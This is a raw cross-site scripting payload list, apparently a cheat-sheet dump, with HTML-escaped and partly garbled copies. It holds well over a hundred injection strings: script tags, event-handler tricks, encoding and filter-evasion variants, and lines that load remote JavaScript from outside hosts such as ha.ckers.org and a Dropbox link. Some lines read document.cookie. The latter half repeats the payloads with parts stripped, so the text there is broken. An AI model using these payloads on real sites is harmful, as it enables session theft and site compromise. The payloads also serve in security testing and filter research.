HTTP-EQUIV=\\\&quot;Set-Cookie\\\&quot; Content=\\\&quot;USERID=&lt;SCRIPT&gt;alert(\\\&#039;XSS\\\&#039;)&lt;/SCRIPT&gt;\\\&quot;&gt;\\r\\n &lt;HEAD&gt;&lt;META HTTP-EQUIV=\\\&quot;CONTENT-TYPE\\\&quot; CONTENT=\\\&quot;text/html; charset=UTF-7\\\&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(\\\&#039;XSS\\\&#039;);+ADw-/SCRIPT+AD4-\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT =\\\&quot;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&quot; \\\&#039;\\\&#039; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT \\\&quot;a=\\\&#039;&gt;\\\&#039;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=`&gt;` SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&#039;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT&gt;document.write(\\\&quot;&lt;SCRI\\\&quot;);&lt;/SCRIPT&gt;PT SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;A HREF=\\\&quot;http://66.102.7.147/\\\&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\\\&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\&quot;http://1113982867/\\\&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\&quot;http://0x42.0x0000066.0x7.0x93/\\\&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\&quot;http://0102.0146.0007.00000223/\\\&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\&quot;htt p://6 6.000146.0x7.147/\\\&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;iframe src=\\\&quot;&amp;Tab;javascript:prompt(1)&amp;Tab;\\\&quot;&gt;\\r\\n&lt;svg&gt;&lt;style&gt;{font-family&amp;colon;\\\&#039;&lt;iframe/onload=confirm(1)&gt;\\\&#039;\\r\\n&lt;input/onmouseover=\\\&quot;javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;\\\&quot;\\r\\n&lt;sVg&gt;&lt;scRipt &gt;alert&amp;lpar;1&amp;rpar; {Opera}\\r\\n&lt;img/src=`` onerror=this.onerror=confirm(1) \\r\\n&lt;form&gt;&lt;isindex formaction=\\\&quot;javascript&amp;colon;confirm(1)\\\&quot;\\r\\n&lt;img src=``&amp;NewLine; onerror=alert(1)&amp;NewLine;\\r\\n&lt;script/&amp;Tab; src=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039; /&amp;Tab;&gt;&lt;/script&gt;\\r\\n&lt;ScRipT 5-0*3+9/3=&gt;prompt(1)&lt;/ScRipT giveanswerhere=?\\r\\n&lt;iframe/src=\\\&quot;data:text/html;&amp;Tab;base64&amp;Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\&quot;&gt;\\r\\n&lt;script /**/&gt;/**/alert(1)/**/&lt;/script /**/\\r\\n&amp;#34;&amp;#62;&lt;h1/onmouseover=\\\&#039;\\\\u0061lert(1)\\\&#039;&gt;\\r\\n&lt;iframe/src=\\\&quot;data:text/html,&lt;svg &amp;#111;&amp;#110;load=alert(1)&gt;\\\&quot;&gt;\\r\\n&lt;meta content=\\\&quot;&amp;NewLine; 1 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1)\\\&quot; http-equiv=\\\&quot;refresh\\\&quot;/&gt;\\r\\n&lt;svg&gt;&lt;script xlink:href=data&amp;colon;,window.open(\\\&#039;https://www.google.com/\\\&#039;)&gt;&lt;/script\\r\\n&lt;svg&gt;&lt;script x:href=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039; {Opera}\\r\\n&lt;meta http-equiv=\\\&quot;refresh\\\&quot; content=\\\&quot;0;url=javascript:confirm(1)\\\&quot;&gt;\\r\\n&lt;iframe src=javascript&amp;colon;alert&amp;lpar;document&amp;period;location&amp;rpar;&gt;\\r\\n&lt;form&gt;&lt;a href=\\\&quot;javascript:\\\\u0061lert&amp;#x28;1&amp;#x29;\\\&quot;&gt;X\\r\\n&lt;/script&gt;&lt;img/*/src=\\\&quot;worksinchrome&amp;colon;prompt&amp;#x28;1&amp;#x29;\\\&quot;/*/onerror=\\\&#039;eval(src)\\\&#039;&gt;\\r\\n&lt;img/&amp;#09;&amp;#10;&amp;#11; src=`~` onerror=prompt(1)&gt;\\r\\n&lt;form&gt;&lt;iframe &amp;#09;&amp;#10;&amp;#11; src=\\\&quot;javascript&amp;#58;alert(1)\\\&quot;&amp;#11;&amp;#10;&amp;#09;;&gt;\\r\\n&lt;a href=\\\&quot;data:application/x-x509-user-cert;&amp;NewLine;base64&amp;NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\&quot;&amp;#09;&amp;#10;&amp;#11;&gt;X&lt;/a\\r\\nhttp://www.google&lt;script .com&gt;alert(document.location)&lt;/script\\r\\n&lt;a&amp;#32;href&amp;#61;&amp;#91;&amp;#00;&amp;#93;\\\&quot;&amp;#00; onmouseover=prompt&amp;#40;1&amp;#41;&amp;#47;&amp;#47;\\\&quot;&gt;XYZ&lt;/a\\r\\n&lt;img/src=@&amp;#32;&amp;#13; onerror = prompt(\\\&#039;&amp;#49;\\\&#039;)\\r\\n&lt;style/onload=prompt&amp;#40;\\\&#039;&amp;#88;&amp;#83;&amp;#83;\\\&#039;&amp;#41;\\r\\n&lt;script ^__^&gt;alert(String.fromCharCode(49))&lt;/script ^__^\\r\\n&lt;/style &amp;#32;&gt;&lt;script &amp;#32; :-(&gt;/**/alert(document.location)/**/&lt;/script &amp;#32; :-(\\r\\n&amp;#00;&lt;/form&gt;&lt;input type&amp;#61;\\\&quot;date\\\&quot; onfocus=\\\&quot;alert(1)\\\&quot;&gt;\\r\\n&lt;form&gt;&lt;textarea &amp;#13; onkeyup=\\\&#039;\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074&amp;#x28;1&amp;#x29;\\\&#039;&gt;\\r\\n&lt;script /***/&gt;/***/confirm(\\\&#039;\\\\uFF41\\\\uFF4C\\\\uFF45\\\\uFF52\\\\uFF54\\\\u1455\\\\uFF11\\\\u1450\\\&#039;)/***/&lt;/script /***/\\r\\n&lt;iframe srcdoc=\\\&#039;&amp;lt;body onload=prompt&amp;lpar;1&amp;rpar;&amp;gt;\\\&#039;&gt;\\r\\n&lt;a href=\\\&quot;javascript:void(0)\\\&quot; onmouseover=&amp;NewLine;javascript:alert(1)&amp;NewLine;&gt;X&lt;/a&gt;\\r\\n&lt;script ~~~&gt;alert(0%0)&lt;/script ~~~&gt;\\r\\n&lt;style/onload=&amp;lt;!--&amp;#09;&amp;gt;&amp;#10;alert&amp;#10;&amp;lpar;1&amp;rpar;&gt;\\r\\n&lt;///style///&gt;&lt;span %2F onmousemove=\\\&#039;alert&amp;lpar;1&amp;rpar;\\\&#039;&gt;SPAN\\r\\n&lt;img/src=\\\&#039;http://i.imgur.com/P8mL8.jpg\\\&#039; onmouseover=&amp;Tab;prompt(1)\\r\\n&amp;#34;&amp;#62;&lt;svg&gt;&lt;style&gt;{-o-link-source&amp;colon;\\\&#039;&lt;body/onload=confirm(1)&gt;\\\&#039;\\r\\n&amp;#13;&lt;blink/&amp;#13; onmouseover=pr&amp;#x6F;mp&amp;#116;(1)&gt;OnMouseOver {Firefox &amp; Opera}\\r\\n&lt;marquee onstart=\\\&#039;javascript:alert&amp;#x28;1&amp;#x29;\\\&#039;&gt;^__^\\r\\n&lt;div/style=\\\&quot;width:expression(confirm(1))\\\&quot;&gt;X&lt;/div&gt; {IE7}\\r\\n&lt;iframe// src=javaSCRIPT&amp;colon;alert(1)\\r\\n//&lt;form/action=javascript&amp;#x3A;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;&lt;input/type=\\\&#039;submit\\\&#039;&gt;//\\r\\n/*iframe/src*/&lt;iframe/src=\\\&quot;&lt;iframe/src=@\\\&quot;/onload=prompt(1) /*iframe/src*/&gt;\\r\\n//|\\\\\\\\ &lt;script //|\\\\\\\\ src=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039;&gt; //|\\\\\\\\ &lt;/script //|\\\\\\\\\\r\\n&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src&amp;#x3A;\\\&#039;&lt;style/onload=this.onload=confirm(1)&gt;\\\&#039;&lt;/font&gt;/&lt;/style&gt;\\r\\n&lt;a/href=\\\&quot;javascript:&amp;#13; javascript:prompt(1)\\\&quot;&gt;&lt;input type=\\\&quot;X\\\&quot;&gt;\\r\\n&lt;/plaintext\\\\&gt;&lt;/|\\\\&gt;&lt;plaintext/onmouseover=prompt(1)\\r\\n&lt;/svg&gt;\\\&#039;\\\&#039;&lt;svg&gt;&lt;script \\\&#039;AQuickBrownFoxJumpsOverTheLazyDog\\\&#039;&gt;alert&amp;#x28;1&amp;#x29; {Opera}\\r\\n&lt;a href=\\\&quot;javascript&amp;colon;\\\\u0061&amp;#x6C;&amp;#101%72t&amp;lpar;1&amp;rpar;\\\&quot;&gt;&lt;button&gt;\\r\\n&lt;div onmouseover=\\\&#039;alert&amp;lpar;1&amp;rpar;\\\&#039;&gt;DIV&lt;/div&gt;\\r\\n&lt;iframe style=\\\&quot;position:absolute;top:0;left:0;width:100%;height:100%\\\&quot; onmouseover=\\\&quot;prompt(1)\\\&quot;&gt;\\r\\n&lt;a href=\\\&quot;jAvAsCrIpT&amp;colon;alert&amp;lpar;1&amp;rpar;\\\&quot;&gt;X&lt;/a&gt;\\r\\n&lt;embed src=\\\&quot;http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\&quot;&gt;\\r\\n&lt;object data=\\\&quot;http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\&quot;&gt;\\r\\n&lt;var onmouseover=\\\&quot;prompt(1)\\\&quot;&gt;On Mouse Over&lt;/var&gt;\\r\\n&lt;a href=javascript&amp;colon;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;Click Here&lt;/a&gt;\\r\\n&lt;img src=\\\&quot;/\\\&quot; =_=\\\&quot; title=\\\&quot;onerror=\\\&#039;prompt(1)\\\&#039;\\\&quot;&gt;\\r\\n&lt;%&lt;!--\\\&#039;%&gt;&lt;script&gt;alert(1);&lt;/script --&gt;\\r\\n&lt;script src=\\\&quot;data:text/javascript,alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;iframe/src \\\\/\\\\/onload = prompt(1)\\r\\n&lt;iframe/onreadystatechange=alert(1)\\r\\n&lt;svg/onload=alert(1)\\r\\n&lt;input value=&lt;&gt;&lt;iframe/src=javascript:confirm(1)\\r\\n&lt;input type=\\\&quot;text\\\&quot; value=`` &lt;div/onmouseover=\\\&#039;alert(1)\\\&#039;&gt;X&lt;/div&gt;\\r\\n&lt;iframe src=j&amp;Tab;a&amp;Tab;v&amp;Tab;a&amp;Tab;s&amp;Tab;c&amp;Tab;r&amp;Tab;i&amp;Tab;p&amp;Tab;t&amp;Tab;:a&amp;Tab;l&amp;Tab;e&amp;Tab;r&amp;Tab;t&amp;Tab;%28&amp;Tab;1&amp;Tab;%29&gt;&lt;/iframe&gt;\\r\\n&lt;img src=`xx:xx`onerror=alert(1)&gt;\\r\\n&lt;object type=\\\&quot;text/x-scriptlet\\\&quot; data=\\\&quot;http://jsfiddle.net/XLE63/ \\\&quot;&gt;&lt;/object&gt;\\r\\n&lt;meta http-equiv=\\\&quot;refresh\\\&quot; content=\\\&quot;0;javascript&amp;colon;alert(1)\\\&quot;/&gt;\\r\\n&lt;math&gt;&lt;a xlink:href=\\\&quot;//jsfiddle.net/t846h/\\\&quot;&gt;click\\r\\n&lt;embed code=\\\&quot;http://businessinfo.co.uk/labs/xss/xss.swf\\\&quot; allowscriptaccess=always&gt;\\r\\n&lt;svg contentScriptType=text/vbs&gt;&lt;script&gt;MsgBox+1\\r\\n&lt;a href=\\\&quot;data:text/html;base64_,&lt;svg/onload=\\\\u0061&amp;#x6C;&amp;#101%72t(1)&gt;\\\&quot;&gt;X&lt;/a\\r\\n&lt;iframe/onreadystatechange=\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(\\\&#039;\\\\u0061\\\&#039;) worksinIE&gt;\\r\\n&lt;script&gt;~\\\&#039;\\\\u0061\\\&#039; ; \\\\u0074\\\\u0068\\\\u0072\\\\u006F\\\\u0077 ~ \\\\u0074\\\\u0068\\\\u0069\\\\u0073. \\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(~\\\&#039;\\\\u0061\\\&#039;)&lt;/script U+\\r\\n&lt;script/src=\\\&quot;data&amp;colon;text%2Fj\\\\u0061v\\\\u0061script,\\\\u0061lert(\\\&#039;\\\\u0061\\\&#039;)\\\&quot;&gt;&lt;/script a=\\\\u0061 &amp; /=%2F\\r\\n&lt;script/src=data&amp;colon;text/j\\\\u0061v\\\\u0061&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116,\\\\u0061%6C%65%72%74(/XSS/)&gt;&lt;/script\\r\\n&lt;object data=javascript&amp;colon;\\\\u0061&amp;#x6C;&amp;#101%72t(1)&gt;\\r\\n&lt;script&gt;+-+-1-+-+alert(1)&lt;/script&gt;\\r\\n&lt;body/onload=&amp;lt;!--&amp;gt;&amp;#10alert(1)&gt;\\r\\n&lt;script itworksinallbrowsers&gt;/*&lt;script* */alert(1)&lt;/script\\r\\n&lt;img src ?itworksonchrome?\\\\/onerror = alert(1)\\r\\n&lt;svg&gt;&lt;script&gt;//&amp;NewLine;confirm(1);&lt;/script &lt;/svg&gt;\\r\\n&lt;svg&gt;&lt;script onlypossibleinopera:-)&gt; alert(1)\\r\\n&lt;a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script&amp;#x3A;&amp;#97lert(1)&gt;ClickMe\\r\\n&lt;script x&gt; alert(1) &lt;/script 1=2\\r\\n&lt;div/onmouseover=\\\&#039;alert(1)\\\&#039;&gt; style=\\\&quot;x:\\\&quot;&gt;\\r\\n&lt;--`&lt;img/src=` onerror=alert(1)&gt; --!&gt;\\r\\n&lt;script/src=&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,&amp;#x0061;&amp;#x06c;&amp;#x0065;&amp;#x00000072;&amp;#x00074;(1)&gt;&lt;/script&gt;\\r\\n&lt;div style=\\\&quot;position:absolute;top:0;left:0;width:100%;height:100%\\\&quot; onmouseover=\\\&quot;prompt(1)\\\&quot; onclick=\\\&quot;alert(1)\\\&quot;&gt;x&lt;/button&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=window.open(\\\&#039;https://www.google.com/\\\&#039;);&gt;\\r\\n&lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;CLICKME\\r\\n&lt;math&gt;&lt;a xlink:href=\\\&quot;//jsfiddle.net/t846h/\\\&quot;&gt;click\\r\\n&lt;object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;\\r\\n&lt;iframe src=\\\&quot;data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\\\&quot;&gt;&lt;/iframe&gt;\\r\\n&lt;a href=\\\&quot;data:text/html;blabla,&amp;#60&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#32&amp;#115&amp;#114&amp;#99&amp;#61&amp;#34&amp;#104&amp;#116&amp;#116&amp;#112&amp;#58&amp;#47&amp;#47&amp;#115&amp;#116&amp;#101&amp;#114&amp;#110&amp;#101&amp;#102&amp;#97&amp;#109&amp;#105&amp;#108&amp;#121&amp;#46&amp;#110&amp;#101&amp;#116&amp;#47&amp;#102&amp;#111&amp;#111&amp;#46&amp;#106&amp;#115&amp;#34&amp;#62&amp;#60&amp;#47&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#62&amp;#8203\\\&quot;&gt;Click Me&lt;/a&gt;\\r\\n\\\&#039;\\\&#039;;!--\\\&quot;&lt;XSS&gt;=&amp;{()}\\r\\n\\\&#039;&gt;//\\\\\\\\,&lt;\\\&#039;&gt;\\\&quot;&gt;\\\&quot;&gt;\\\&quot;*\\\&quot;\\r\\n\\\&#039;); alert(\\\&#039;XSS\\r\\n&lt;script&gt;alert(1);&lt;/script&gt;\\r\\n&lt;script&gt;alert(\\\&#039;XSS\\\&#039;);&lt;/script&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=javascript:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;\\r\\n&lt;IMG \\\&quot;\\\&quot;\\\&quot;&gt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;)&lt;/SCRIPT&gt;\\\&quot;&gt;\\r\\n&lt;scr&lt;script&gt;ipt&gt;alert(\\\&#039;XSS\\\&#039;);&lt;/scr&lt;/script&gt;ipt&gt;\\r\\n&lt;script&gt;alert(String.fromCharCode(88,83,83))&lt;/script&gt; \\r\\n&lt;img src=foo.png onerror=alert(/xssed/) /&gt;\\r\\n&lt;style&gt;@im\\\\port\\\&#039;\\\\ja\\\\vasc\\\\ript:alert(\\\\\\\&quot;XSS\\\\\\\&quot;)\\\&#039;;&lt;/style&gt;\\r\\n&lt;? echo(\\\&#039;&lt;scr)\\\&#039;; echo(\\\&#039;ipt&gt;alert(\\\\\\\&quot;XSS\\\\\\\&quot;)&lt;/script&gt;\\\&#039;); ?&gt;\\r\\n&lt;marquee&gt;&lt;script&gt;alert(\\\&#039;XSS\\\&#039;)&lt;/script&gt;&lt;/marquee&gt;\\r\\n&lt;IMG SRC=\\\\\\\&quot;jav&amp;#x09;ascript:alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\\\\\&quot;jav&amp;#x0A;ascript:alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\\\\\&quot;jav&amp;#x0D;ascript:alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;\\r\\n\\\&quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;\\r\\n&lt;script src=http://yoursite.com/your_files.js&gt;&lt;/script&gt;\\r\\n&lt;/title&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;\\r\\n&lt;/textarea&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;\\r\\n&lt;IMG LOWSRC=\\\\\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;&gt;\\r\\n&lt;IMG DYNSRC=\\\\\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;&gt;\\r\\n&lt;font style=\\\&#039;color:expression(alert(document.cookie))\\\&#039;&gt;\\r\\n&lt;img src=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;script language=\\\&quot;JavaScript\\\&quot;&gt;alert(\\\&#039;XSS\\\&#039;)&lt;/script&gt;\\r\\n&lt;body onunload=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;body onLoad=\\\&quot;alert(\\\&#039;XSS\\\&#039;);\\\&quot;\\r\\n[color=red\\\&#039; onmouseover=\\\&quot;alert(\\\&#039;xss\\\&#039;)\\\&quot;]mouse over[/color]\\r\\n\\\&quot;/&gt;&lt;/a&gt;&lt;/&gt;&lt;img src=1.gif onerror=alert(1)&gt;\\r\\nwindow.alert(\\\&quot;Bonjour !\\\&quot;);\\r\\n&lt;div style=\\\&quot;x:expression((window.r==1)?\\\&#039;\\\&#039;:eval(\\\&#039;r=1;\\r\\nalert(String.fromCharCode(88,83,83));\\\&#039;))\\\&quot;&gt;\\r\\n&lt;iframe&lt;?php echo chr(11)?&gt; onload=alert(\\\&#039;XSS\\\&#039;)&gt;&lt;/iframe&gt;\\r\\n\\\&quot;&gt;&lt;script alert(String.fromCharCode(88,83,83))&lt;/script&gt;\\r\\n\\\&#039;&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\&#039;\\\&quot;&gt;&gt;&lt;script&gt;alert(\\\&#039;XSS\\\&#039;)&lt;/script&gt;\\r\\n\\\&#039;\\\&quot;&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS&lt;/h1&gt;&lt;/marquee&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\&quot;refresh\\\\\\\&quot; CONTENT=\\\\\\\&quot;0;url=javascript:alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\&quot;refresh\\\\\\\&quot; CONTENT=\\\\\\\&quot;0; URL=http://;URL=javascript:alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&gt;\\r\\n&lt;script&gt;var var = 1; alert(var)&lt;/script&gt;\\r\\n&lt;STYLE type=\\\&quot;text/css\\\&quot;&gt;BODY{background:url(\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;)}&lt;/STYLE&gt;\\r\\n&lt;?=\\\&#039;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;)&lt;/SCRIPT&gt;\\\&#039;?&gt;\\r\\n&lt;IMG SRC=\\\&#039;vbscript:msgbox(\\\\\\\&quot;XSS\\\\\\\&quot;)\\\&#039;&gt;\\r\\n\\\&quot; onfocus=alert(document.domain) \\\&quot;&gt; &lt;\\\&quot;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\\\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&gt;&lt;/FRAMESET&gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\\\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\nperl -e \\\&#039;print \\\\\\\&quot;&lt;SCR\\\\0IPT&gt;alert(\\\\\\\&quot;XSS\\\\\\\&quot;)&lt;/SCR\\\\0IPT&gt;\\\\\\\&quot;;\\\&#039; &gt; out\\r\\nperl -e \\\&#039;print \\\\\\\&quot;&lt;IMG SRC=java\\\\0script:alert(\\\\\\\&quot;XSS\\\\\\\&quot;)&gt;\\\\\\\&quot;;\\\&#039; &gt; out\\r\\n&lt;br size=\\\\\\\&quot;&amp;{alert(\\\&#039;XSS\\\&#039;)}\\\\\\\&quot;&gt;\\r\\n&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;\\r\\n&lt;/br style=a:expression(alert())&gt;\\r\\n&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\r\\n\\\&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\\\\]^`=alert(\\\&quot;XSS\\\&quot;)&gt;\\r\\n[color=red width=expression(alert(123))][color]\\r\\n&lt;BASE HREF=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);//\\\&quot;&gt;\\r\\nExecute(MsgBox(chr(88)&amp;chr(83)&amp;chr(83)))&lt;\\r\\n\\\&quot;&gt;&lt;/iframe&gt;&lt;script&gt;alert(123)&lt;/script&gt;</code> <p>keyword(s): zz</p> <p>description: <b alert&#40;1&#41;0\\r\\n&lt;div id=\\\"div1\\\">&lt;input value=\\\"``=(1)\\\"&gt;</div> <div id=\\\"div2\\\"></div>document.getElementById(\\\"div2\\\") = document.getElementById(\\\"div1\\\");\\r\\n<x \\\'=\\\"foo\\\"><x foo=\\\'><img >\\>\\r\\n<img >\\>\\r\\n\\r\\n<div =(1)>x\\r\\n&lt;? foo=\\\">(1)\\\">\\r\\n&lt;! foo=\\\"&gt;(1)\\\"&gt;\\r\\n&lt;/ foo=\\\"&gt;(1)\\\"&gt;\\r\\n&lt;? foo=\\\"&gt;&lt;x foo=\\\'?&gt;(1)\\\'&gt;\\\"&gt;\\r\\n&lt;! foo=\\\"[[[Inception]]\\\"&gt;&lt;x foo=\\\"]foo&gt;(1)\\\"&gt;\\r\\n&lt;% foo&gt;&lt;x foo=\\\"%&gt;(1)\\\"&gt;\\r\\n&lt;div id=d&gt;&lt;x xmlns=\\\"&gt;&lt;iframe =(1)\\\"&gt;&lt;/div&gt; d=d\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img[&gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;a &gt;XXX&lt;/a&gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;title =(1)&gt;&lt;/title&gt;&lt;title title=&gt;\\r\\n&lt;a &gt;&lt;/a&gt;&lt;img &gt;&lt;img &gt;&lt;/a&gt;\\\"&gt;\\r\\n&lt;!--[if]&gt;(1)--&gt;\\r\\n&lt;!--[if&lt;img &gt; --&gt;\\&gt;&lt;/object&gt; &lt;object classid=\\\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\\\" =\\\"(1)\\\" &gt;&lt;param name=postdomevents /&gt;&lt;/object&gt;\\r\\n&lt;a &gt;X\\r\\n&lt;style&gt;p[foo=bar{}*{-o-link:\\\'(1)\\\'}{}*{-o-link-source:current}]{color:red};&lt;/style&gt;\\r\\n&lt;link rel=stylesheet href=PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\"&gt;\\r\\n&lt;h1/=\\\'\\\alert&#40;1&#41;\\\'&gt;\\r\\n&lt;iframe/src=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\" &#11;&gt;X&lt;/a\\r\\nhttp://www.googlealert)\r\\n&lt;a &gt;XYZ&lt;/a\\r\\n&lt;img/&gt;alert&#40;String.fromCharCode(49&#41;)^__^\\r\\n&lt;/style &gt;&lt;input type=\\\"date\\\" =\\\"alert&#40;1&#41;\\\"&gt;\\r\\n&lt;form&gt;&lt;textarea &#13; =\\\'\\\a\\\l\\\e\\\r\\\t(1)\\\'&gt;\\r\\n\\\'&gt;\\r\\n&lt;a &gt;X&lt;/a&gt;\\r\\n\\r\\n&lt;style/=&lt;!-- &gt; alert &#40;1&#41;&gt;\\r\\n&lt;///style///&gt;&lt;span / =\\\'alert&#40;1&#41;\\\'&gt;SPAN\\r\\n&lt;img/&gt;&lt;svg&gt;&lt;style&gt;{-o-link-source:\\\'&lt;body/=confirm&#40;1&#41;&gt;\\\'\\r\\n&#13;&lt;blink/&#13; =prompt&#40;1&#41;&gt;OnMouseOver {Firefox & Opera}\\r\\n&lt;marquee =\\\'(1)\\\'&gt;^__^\\r\\n&lt;div/&gt;X&lt;/div&gt; {IE7}\\r\\n&lt;iframe// src=(1)\\r\\n//&lt;form/action=()&gt;&lt;input/type=\\\'submit\\\'&gt;//\\r\\n/*iframe/src*/&lt;iframe/src=\\\"&lt;iframe/src=@\\\"/=prompt&#40;1&#41; /*iframe/src*/&gt;\\r\\n//|\\\\\\\\ //|\\\\\\\\ 